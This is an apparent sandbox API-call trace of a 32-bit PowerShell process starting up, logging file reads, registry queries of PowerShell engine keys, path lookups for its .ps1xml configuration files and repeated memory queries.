	[0152.003] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.003] GetLastError () returned 0x0
	[0152.004] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.004] GetLastError () returned 0x0
	[0152.004] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.004] GetLastError () returned 0x0
	[0152.004] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.004] GetLastError () returned 0x0
	[0152.004] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.004] GetLastError () returned 0x0
	[0152.004] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.005] GetLastError () returned 0x0
	[0152.005] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.005] GetLastError () returned 0x0
	[0152.005] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.005] GetLastError () returned 0x0
	[0152.005] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.005] GetLastError () returned 0x0
	[0152.005] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.006] GetLastError () returned 0x0
	[0152.011] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.011] GetLastError () returned 0x0
	[0152.011] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.011] GetLastError () returned 0x0
	[0152.011] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.011] GetLastError () returned 0x0
	[0152.011] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.011] GetLastError () returned 0x0
	[0152.012] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.012] GetLastError () returned 0x0
	[0152.012] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.012] GetLastError () returned 0x0
	[0152.012] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.012] GetLastError () returned 0x0
	[0152.012] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1000, lpOverlapped=0x0) returned 1
	[0152.012] GetLastError () returned 0x0
	[0152.012] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x1b4, lpOverlapped=0x0) returned 1
	[0152.012] GetLastError () returned 0x0
	[0152.013] ReadFile (in: hFile=0x350, lpBuffer=0x2bc0c24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xceab4, lpOverlapped=0x0 | out: lpBuffer=0x2bc0c24*, lpNumberOfBytesRead=0xceab4*=0x0, lpOverlapped=0x0) returned 1
	[0152.013] GetLastError () returned 0x0
	[0152.013] CloseHandle (hObject=0x350) returned 1
	[0152.013] GetLastError () returned 0x0
	[0152.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xce614, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0152.013] GetLastError () returned 0x0
	[0152.013] SetErrorMode (uMode=0x1) returned 0x1
	[0152.013] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2be14b4 | out: lpFileInformation=0x2be14b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0152.013] GetLastError () returned 0x0
	[0152.013] SetErrorMode (uMode=0x1) returned 0x1
	[0152.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xce5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0152.013] GetLastError () returned 0x0
	[0152.013] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcea38 | out: phkResult=0xcea38*=0x350) returned 0x0
	[0152.013] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcea80, lpData=0x0, lpcbData=0xcea7c*=0x0 | out: lpType=0xcea80*=0x1, lpData=0x0, lpcbData=0xcea7c*=0x56) returned 0x0
	[0152.014] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcea80, lpData=0x337c48, lpcbData=0xcea7c*=0x56 | out: lpType=0xcea80*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xcea7c*=0x56) returned 0x0
	[0152.014] RegCloseKey (hKey=0x350) returned 0x0
	[0152.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xce5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0152.014] GetLastError () returned 0x0
	[0152.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xce574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0152.014] GetLastError () returned 0x0
	[0156.195] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.283] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.287] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.287] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.288] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.288] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.290] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.297] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.319] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.319] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.320] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.320] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.321] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.321] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.322] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.322] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.442] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.452] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.452] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.453] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.454] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.455] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.455] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.456] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.456] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.457] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.457] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.458] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.458] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.458] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.461] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.465] VirtualQuery (in: lpAddress=0xcd978, lpBuffer=0xce978, dwLength=0x1c | out: lpBuffer=0xce978*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.466] VirtualQuery (in: lpAddress=0xcd978, lpBuffer=0xce978, dwLength=0x1c | out: lpBuffer=0xce978*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.466] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0156.469] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0157.812] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0157.812] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0157.812] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.127] GetLastError () returned 0xcb
	[0158.173] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.186] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.186] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.187] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.187] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.189] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.189] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.193] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.195] VirtualQuery (in: lpAddress=0xcd974, lpBuffer=0xce974, dwLength=0x1c | out: lpBuffer=0xce974*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0158.306] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xceafc | out: phkResult=0xceafc*=0x34c) returned 0x0
	[0158.307] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0xceb64, lpData=0x0, lpcbData=0xceb60*=0x0 | out: lpType=0xceb64*=0x1, lpData=0x0, lpcbData=0xceb60*=0x74) returned 0x0
	[0158.307] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0xceb44, lpData=0x0, lpcbData=0xceb40*=0x0 | out: lpType=0xceb44*=0x1, lpData=0x0, lpcbData=0xceb40*=0x74) returned 0x0
	[0158.307] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0xceb44, lpData=0x337c48, lpcbData=0xceb40*=0x74 | out: lpType=0xceb44*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xceb40*=0x74) returned 0x0
	[0158.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xce6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0158.307] GetLastError () returned 0xcb
	[0158.307] SetErrorMode (uMode=0x1) returned 0x1
	[0158.307] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xceb44 | out: lpFileInformation=0xceb44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0158.307] GetLastError () returned 0xcb
	[0158.307] SetErrorMode (uMode=0x1) returned 0x1
	[0158.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.310] GetLastError () returned 0xcb
	[0158.310] SetErrorMode (uMode=0x1) returned 0x1
	[0158.310] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb38 | out: lpFileInformation=0xceb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0158.310] GetLastError () returned 0xcb
	[0158.310] SetErrorMode (uMode=0x1) returned 0x1
	[0158.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0158.310] GetLastError () returned 0xcb
	[0158.310] SetErrorMode (uMode=0x1) returned 0x1
	[0158.310] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb38 | out: lpFileInformation=0xceb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0158.310] GetLastError () returned 0xcb
	[0158.310] SetErrorMode (uMode=0x1) returned 0x1
	[0158.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.310] GetLastError () returned 0xcb
	[0158.310] SetErrorMode (uMode=0x1) returned 0x1
